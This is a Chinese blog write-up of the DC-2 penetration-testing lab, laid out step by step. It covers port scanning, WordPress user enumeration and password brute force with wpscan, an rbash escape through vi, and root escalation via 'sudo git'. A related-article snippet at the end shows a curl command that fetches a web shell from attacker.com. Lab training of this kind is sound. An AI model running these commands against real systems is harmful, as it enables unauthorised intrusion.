DC-2靶场渗透测试实验整理

最新推荐文章于 2024-03-14 09:14:59 发布
最新推荐文章于 2024-03-14 09:14:59 发布
阅读量1.7k 收藏 7
点赞数 3
分类专栏: 网络安全 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u013930899/article/details/126880563
版权

目录

一、主机存活探测

二、主机端口探测

三、漏洞探测和利用

(一)第一个flag

(二)第二个flag

1. cewl生成密码字典

2. wpscan基于字典爆破

(三)第三个flag

1. rbash逃逸

(四)第四个flag

四、提权

(一)最终flag

一、主机存活探测

        arp-scan -l 进行ARP扫描,排除其他设备IP,192.168.101.69是DC-2的IP地址。

二、主机端口探测

        先用masscan快速扫描开放的端口: 
masscan --rate=100000 -p 1-65535 192.168.101.69
        可以看到扫描到了80和7744两个端口
        使用nmap扫描开放端口的指纹等信息: 
nmap -T4 -sV -p80,7744 -A 192.168.101.69
        可以看到扫描出几个信息:
  1. 80端口运行的http服务,版本httpd 2.4.10
  2. http上运行的web服务重定向到了http://dc-2
  3. 7744端口运行的是openssh服务,版本6.7p1
        先修改/etc/hosts文件,将192.168.101.69对应到dc-2,重新进行nmap扫描:
        这次发现新的信息:http上运行了wordpress 4.7.10

三、漏洞探测和利用

        由于发现网站框架使用的wordpress,本次测试使用wpscan进行。

(一)第一个flag

        打开 http://dc-2/ ,发现第一个flag1

(二)第二个flag

1. cewl生成密码字典

        根据flag1的提示,下一步需要使用cewl对网站进行信息收集生成密码字典,具体做法如下: 
cewl http://dc-2 -w wordlist.txt

2. wpscan基于字典爆破

        现在有了网站的密码字典,没有账号,所以需要使用wpscan对账号进行枚举: 
wpscan --url http://dc-2/ -e u
        发现了三个账号:admin、jerry、tom,再使用wpscan对发现的3个账号分别进行密码比对
        admin账号,没有发现匹配的密码。 
wpscan --url http://dc-2 -U admin -P wordlist.txt
        jerry账号, jerry账号匹配到了密码:adipiscing 
​wpscan --url http://dc-2 -U jerry -P wordlist.txt
        tom账号,tom账号匹配到了密码:parturient 
wpscan --url http://dc-2 -U tom -P wordlist.txt
        
        既然已经得到了jerry和tom的密码,没说的,对wordpress熟悉的话直接登陆,如果不熟悉,还是需要进行目录探测,本文省略目录探测的步骤。
        登陆网址 http://dc-2/wp-login.php ,输入账号jerry,密码adipiscing,进入后台后浏览下网站上有的页面,很快就找到flag2

(三)第三个flag

        使用jerry和tom的账号密码尝试登陆ssh,这里注意,ssh的端口改成了7744。
1. jerry登陆不进ssh
2. tom可以登陆ssh,如下: 
root@kali:~# ssh tom@192.168.101.69 -p 7744
tom@192.168.101.69's password:
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
tom@DC-2:~$
        发现flag3
tom@DC-2:~$ ls
flag3.txt  usr
        cat查看flag3.txt,遇到rbash限制,如下:
tom@DC-2:~$ cat flag3.txt
-rbash: cat: command not found
vi flag3.txt,内容如下:
Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.
or old Tom is always running after

1. rbash逃逸

        为了绕过rbash限制,需要进行rbash逃逸操作,具体如下: 
vi flag3.txt
输入:set  shell=/bin/sh回车
         
输入:shell回车
        逃逸成功。
        设置命令路径变量: 
export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
        再用cat flag3.txt,命令执行成功:

(四)第四个flag

        flag3提示su到jerry,利用前面爆破到的密码进入jerry,如下:
可以得到jerry家目录下的flag4

四、提权

(一)最终flag

        flag4提示需要用到git提权,具体操作如下: 
jerry@DC-2:~$ sudo git -p
输入!/bin/sh提权到root
cd /root
ls
        获得最终flag
見贤思齊
关注
  • 3
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
渗透测试-靶机DC-2-知识点总结
qq_38678845的博客
01-12 726
渗透测试靶机dc-2涉及到的工具与渗透技巧。
DC系列】DC-2靶机实战详细讲解
weixin_44681307的博客
06-28 362
wpscan --url http://dc-2/ --enumerate u 可以查找这个网站有什么用户名,这样我们用户名也就都有了。然后我们打开网站,在Flag看到了提醒,就是告诉我们只需要cewl扫描出来的字典就行,密码都在这里面。进去后我们发现好多命令都不能用,甚至cd都不能用,经过尝试发现vi这个命令可以用,less也可以用。cewl http://dc-2 (-d 目录深度,默认是2.-w 写到一个文件中)这时候执行这个代码,命令权限就有了,原本su命令是不能用的,现在就可以用了。
DC-2靶场
m0_74413354的博客
03-14 570
Vulhub下DC系列靶场DC2靶场通关
dc-2 靶机渗透学习
..
03-15 1298
网络扫描 第一步先查看当前网段,进行主机探活 nmap -A -p- -v 192.168.202.0/24 发现80、7744端口开放 访问192.168.202.131来看看网站的80端口是啥,可以看到提示不能连接dc-2 造成这样的原因感觉是访问192.168.202.131时,发生了一次跳转到http://dc-2域名,而我们本地的host文件没有对应域名的ip,所以导致访问不成功。 以root身份打开/etc/hosts文件,添加如下内容: 192.168.2
vulnhub-dc2靶场
longwanlian的博客
01-19 1974
1、hosts文件指定ip对应域名2、工具使用:cewl(收集网站字典)、dirb(目录探测)、wpscan(针对wordpress制作的扫描工具)3、linux命令compgen -c #查看当前可用命令find / -perm -u=s -type f 2>/dev/null #查找存在sudo权限的命令sudo -l #查看当前用户可使用的sudo权限6)][外链图片转存中…(img-UnDKf5oc-1705657141846)]至此结束1、hosts文件指定ip对应域名。
DC靶场系列--DC2
BGiscool的博客
08-09 1438
DC2靶场
vulnhub靶场实战系列-DC-2实战
最新发布
05-18
vulnhub靶场实战系列-DC-2实战
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
DC-4-Web渗透测试靶机
01-19
DC-4
DC2靶场 wordpress
m0_62438849的博客
03-03 1009
试着登录网站,但是没有看到登录框,所以要扫描一下整个网站目录,可以用dirb http://dc-2或者dirsearch -u(指定url)http://dc-2。然后就能访问网站了,看到flag1,常用的字典攻击可能会不奏效,需要用 字典生成工具cewl,密码总是越多越好,但无法获得所有密码,登录后可以看到下一个flag。可以知道登录入口是,http://dc-2/wp-admin/(wordpress的登录入口就是/wp-admin/)Cewl是一个 ruby 应用,爬行指定url的指定深度。
DC-1靶场渗透实验
Alashan12的博客
05-05 1884
一、环境准备 Kali虚拟机 DC-1靶场http://www.five86.com/downloads/DC-1.zip 首先将kali虚拟机和靶机DC1都设置为net模式 ifconfig查看kali的IP为192.168.152.128 使用nmap扫描此网段下的主机 启动DC-1靶机 再次扫描得到DC-1靶机的IP地址为192.168.152.138 二、实验过程 使用nmap针对该IP进行详细扫描 发现打开了22、80和111的端口,还开启了s...
小H靶场学习笔记:DC-2
Hack_hui的博客
11-12 269
git提权 rbash逃逸
Vulhub-DC-2靶场通关攻略
weixin_51339377的博客
03-16 724
arp-scan -l nmap -sV -p- 192.168.109.140 也可以执行如下命令 可以探测目标主机是否存活 nmap -T4 -sP 192.168.109.140 也可以尝试如下的命令 -A是主动扫描 -p设置的是端口 -oN可以把结果输出到文件 结果保存在root目标下 nmap -T4 -A 192.168.109.140 -p 1-65535 -oN haha.txt 想要访问可以进入如下...
DC-2靶场记录
lionwerson的博客
11-17 966
1.下载DC-2靶场: 下载地址https://download.vulnhub.com/dc/DC-2.zip2.虚拟机打开靶场改网卡模式为桥接模式,打开虚拟机。 如果要是直接访问靶机的IP的80端口是打不开的,会跳转到http://dc-2/,要修改hosts文件,然后就可以访问到了。 在hosts文件结尾添加: ip地址 dc-2 这是一个wordpress的cms,第一个flag提示我们进行登录并且用cewl生成密码列表。 cewl -w dc.txt http://d.
hydra,cewl等使用方法
Ays.Ie的博客
10-18 813
本篇文章用来记录之前渗透项目所用到的工具,描述他们常规的操作,以及使用情况。以此加深印象。
DC-2简单理解
qq_43717836的博客
03-12 2452
前提: 信息安全初学者一枚,正在努力提升中。。。。 今天渗透的实验靶场,是Vulnhub的DC-2,和之前的DC-1是同系列的。 环境介绍 成功安装virtual Box,只需要下载vlunhub的DC-2项目,导入virtual中即可使用,不需要登录什么的。 渗透 0x01 老样子,打开你的kali,直接nmap,使用参数-Pn扫描网段 nmap -Pn 192.168.3.0/24 继续扫...
DC-5靶场渗透过程中,怎样挂载木马文件
06-02
DC-5 靶场渗透过程中,如果要挂载木马文件,可以按照以下步骤进行操作: 1. 找到可写入的目录:可以使用 `ls -al` 命令查看目录权限,找到可写入的目录。通常会有一些临时目录或者上传目录是可写入的。 2. 上传木马文件:将自己准备好的木马文件上传到可写入的目录中。可以使用 `curl` 或者 `wget` 命令进行上传,例如: ``` curl -o shell.php http://attacker.com/shell.php ``` 上述命令会将 `shell.php` 文件下载到本地,并保存到当前目录下。 3. 运行木马文件:在浏览器中访问上传的木马文件,例如 `http://dc5/wordpress/wp-content/plugins/akismet/views/akismet.php`。如果一切正常,就可以获得一个远程 shell,并在目标系统中执行任意命令了。 需要注意的是,这种做法是违法的,仅用于学习和研究目的,切勿在未授权的情况下对他人的系统进行攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

見贤思齊

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值